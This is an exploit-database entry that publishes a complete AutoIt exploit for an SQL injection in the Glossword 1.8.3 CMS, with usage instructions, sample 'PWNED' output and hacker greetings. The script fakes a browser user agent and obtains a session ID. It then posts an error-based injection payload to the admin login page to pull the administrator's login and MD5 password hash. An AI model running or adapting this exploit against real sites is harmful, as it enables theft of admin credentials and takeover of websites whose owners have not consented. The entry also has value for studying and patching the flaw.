Glossword 1.8.3 SQL injectionc

2013.02.04
Credit: AkaStep
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#cs ============================================================== Vulnerable Software: Glossword 1.8.3 Official site: http://sourceforge.net/projects/glossword/ Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.3/ Vuln: SQLi ==================THIS IS A WHOLE EXPLOIT===================== Exploit Coded In AutoIT. To exploit this vulnerability magic_quotes_gpc must be turned off on server side. Print screen: http://s004.radikal.ru/i206/1302/89/d7398ade1cd7.png POC video: http://youtu.be/55IaNTQS3Fk Exploit usage: C:\0day>glossa.exe http://hacker1.own /glossword/glossword/ 2 ############################################################## # Glossword 1.8.3 SQL injectionc Exploit # # Usage: glossa.exe http://site.tld /installdir/ UID (int) # # DON'T HATE THE HACKER, HATE YOUR OWN CODE! # # VULN/Exploit: AkaStep & HERO_AZE # ############################################################## ############################################################## [*] SENDING FAKE SESSUID: ea0f5d8c7c2c8a2f9f7c3b3e5a3d4f5d [*] ############################################################## ############################################################## [*] CMS is GLOSSWORD! [*] ############################################################## ############################################################## [*] FETCHING VALID SESSUID [*] ############################################################## ############################################################## [*] Got VALID SESSUID: aa0e680bef2679932393abe72b78ef03 [*] ############################################################## ############################################################## [*] !~ P*W*N*E*D ~! [*] -------------------------------------------------------------- [*] Login: admin [*] -------------------------------------------------------------- [*] Password: (MD5) 260efaff0cac0f78a53ccc540e89e72d [*] -------------------------------------------------------------- Admin Panel: hacker1.own/glossword/glossword/gw_admin/login.php -------------------------------------------------------------- [*] Good Luck;) [*] ############################################################## [*] DONE [*] ############################################################## #ce #NoTrayIcon #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_Outfile=glossa.exe #AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_Change2CUI=y #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #include "WinHttp.au3" #include <inet.au3> #include <String.au3> $triptrop=@CRLF & _StringRepeat('#',62) & @CRLF; $exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _ '#' & _StringRepeat(' ',11) & 'Glossword 1.8.3 SQL injection Exploit ' & _StringRepeat(' ',11) & '#' & @CRLF & _ '# Usage: ' & @ScriptName & ' http://site.tld ' & ' /installdir/ ' & ' UID (int) #' & _ @CRLF & "# DON'T HATE THE HACKER, HATE YOUR OWN CODE! #" & @CRLF & _ '# VULN/Exploit: AkaStep & HERO_AZE #' & @CRLF & _StringRepeat('#',62); ConsoleWrite(@CRLF & $exploitname & @CRLF) $method='POST'; $vulnurl='gw_admin/login.php' Global $sessid=0 $cmsindent='lossword'; # We will use it to identify CMS #; $adminpanel=$vulnurl ;#~ Impersonate that We Are Not BOT or exploit.We are human who uses IE.# ~; $useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)'; $msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName & ' http://site.tld ' & ' /installdir/ ' & ' UID (int)' & @CRLF if $CmdLine[0] <> 3 Then ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF); MsgBox(64,"",$msg_usage); exit; EndIf if $CmdLine[0]=3 Then $targetsite=$CmdLine[1]; $installdir=$CmdLine[2]; $uidtoattack=Number(StringMid($CmdLine[3],1,255)); EndIf if not StringIsDigit($uidtoattack) Then ConsoleWrite(' UID is wrong! Exit' ); Exit; EndIf if StringStripWS($targetsite,8)='' OR StringStripWS($installdir,8)='' Then ConsoleWrite('Are you kidding meeeeen?'); Exit; EndIf HttpSetUserAgent($useragent) $doublecheck=InetGet($targetsite,'',1); if @error Then ConsoleWrite('[*] Incorrect Domain Name/Or you are Offline! [*]' & @CRLF) Exit; EndIf sleep(Random(1200,2500,1)); sendfakeretrivevalidsess($targetsite,$installdir) HttpSetUserAgent($useragent); $sidentify=_INetGetSource($targetsite & $adminpanel,True); Func exploit($targetsite,$installdir,$sessid) Global $sAddress = $targetsite Global $PAYLOADTOSEND ="arPost[user_name]=') AND (select floor(rand(0)*2) from(select count(*)," & _ "concat((select concat(0x3C73696B6469723E,login,0x7c,password,0x3C2F73696B6469723E,0x7c) from " & _ "gw_auth where id_auth=" & $uidtoattack & "),floor(rand(0)*2))x from information_schema.tables group by x)a)-- " & _ " AND 1=('1&arPost[user_email]=trueownage&a=lostpass&sid=" & $sessid & "&post=Send password"; Global $sDomain = $targetsite Global $sPage = $installdir & $vulnurl Global $sAdditionalData = $PAYLOADTOSEND Global $hOpen = _WinHttpOpen($useragent) Global $hConnect = _WinHttpConnect($hOpen, $sDomain) Global $hRequest = _WinHttpOpenRequest($hConnect, "POST", $sPage, -1, -1, -1, '') _WinHttpSendRequest($hRequest, "Content-Type: application/x-www-form-urlencoded", $sAdditionalData) _WinHttpReceiveResponse($hRequest) Global $sReturned If _WinHttpQueryDataAvailable($hRequest) Then Do $sReturned &= _WinHttpReadData($hRequest) Until @error if StringInStr($sReturned,'<sikdir>') and StringInStr($sReturned,'</sikdir>') Then $zsuxxv = StringRegExp($sReturned, '<(?i)sikdir>(.*?)</(?i)sikdir>', 1) For $x = 0 To UBound($zsuxxv) - 1 Beep(100,1000); ConsoleWrite($triptrop & '[*] !~ P*W*N*E*D ~! [*] ' & _ StringReplace($triptrop,'#','-') & '[*] Login: ' & StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1) & _ _StringRepeat(' ',StringLen($triptrop)-18-StringLen(StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1))) & '[*]' & _ StringReplace($triptrop,'#','-') & '[*] Password: (MD5) ' & StringReplace($zsuxxv[$x],StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')),'') & _ ' [*] ' & _ StringReplace($triptrop,'#','-') & _ 'Admin Panel: ' & $targetsite & $installdir &$adminpanel & ' ' & StringReplace($triptrop,'#','-') & _ '[*] Good Luck;) [*]' & _ $triptrop & '[*] DONE [*]' & _ $triptrop); Next Else ConsoleWrite($triptrop & '[*] ' & _StringRepeat(' ',18) & ' NO SUCH UID! ' & _StringRepeat(' ',18) & _ ' [*]' & $triptrop); Beep(1500,1000); Exit EndIf EndIf _WinHttpCloseHandle($hRequest) _WinHttpCloseHandle($hConnect) _WinHttpCloseHandle($hOpen) EndFunc;=> exploit(); Func sendfakeretrivevalidsess($targetsite,$installdir) $fakesessionID=''; Do $fakesessionID&=Chr(Random(97,102,1)) & Random(0,9,1) until StringLen($fakesessionID)=32 $fakesessionID=StringMid($fakesessionID,Random(1,32,1),1) & StringMid($fakesessionID,1,StringLen($fakesessionID)-1) ConsoleWrite($triptrop & '[*] SENDING FAKE SESSUID: ' & $fakesessionID & ' [*] ' & $triptrop) sleep(Random(1000,2500,1)) $rtarget=$targetsite & $installdir &"gw_admin/login.php?visualtheme=gw_admin&sid=" &$fakesessionID; HttpSetUserAgent($useragent); $str=_INetGetSource($rtarget); if StringInStr($str,"Session does not exist.") then ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',18) & 'CMS is GLOSSWORD! ' & _StringRepeat(' ',19) & '[*]' & $triptrop); sleep(Random(1000,2500,1)) Else ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',11) &'NOPE:( THIS IS NOT GLOSSWORD CMS.' &_StringRepeat(' ',12) &'[*]' & $triptrop); exit; EndIf $i=123 $mystr=''; ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',16) & 'FETCHING VALID SESSUID' & _StringRepeat(' ',17) & ' [*]' & $triptrop) sleep(Random(1000,2500,1)) Do $i+=1; if $i>=4000 then ExitLoop;//Just for make sure we are not going to infinitive loop if there any error occurs.// $mystr&=StringMid($str,$i,1) until StringInStr($mystr,chr(34)); $sessid=StringMid($mystr,StringInStr($mystr,Chr(61))+1,32) if not $sessid =32 Then ConsoleWrite($triptrop & '[*] Sorry Man! Theris an error while fetching new VALID SESSUID [*]' & $triptrop) exit; Else ConsoleWrite($triptrop & '[*] Got VALID SESSUID: ' & $sessid & ' [*]' & $triptrop) EndIf $targetsite=StringReplace(StringReplace($targetsite,'http://',''),'/','') exploit($targetsite,$installdir,$sessid) EndFunc;=>sendfakeretrivevalidsess(); #cs ================================================ KUDOSSSSSSS ================================================ packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru secunia.com securityhome.eu exploitsdownload.com osvdb.com websecurity.com.ua 1337day.com itsecuritysolutions.org to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 * To All Turkish Hackers Also special thanks to: ottoman38 & HERO_AZE ================================================ /AkaStep #ce

References:

http://sourceforge.net/projects/glossword/
http://youtu.be/55IaNTQS3Fk
http://s004.radikal.ru/i206/1302/89/d7398ade1cd7.png


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top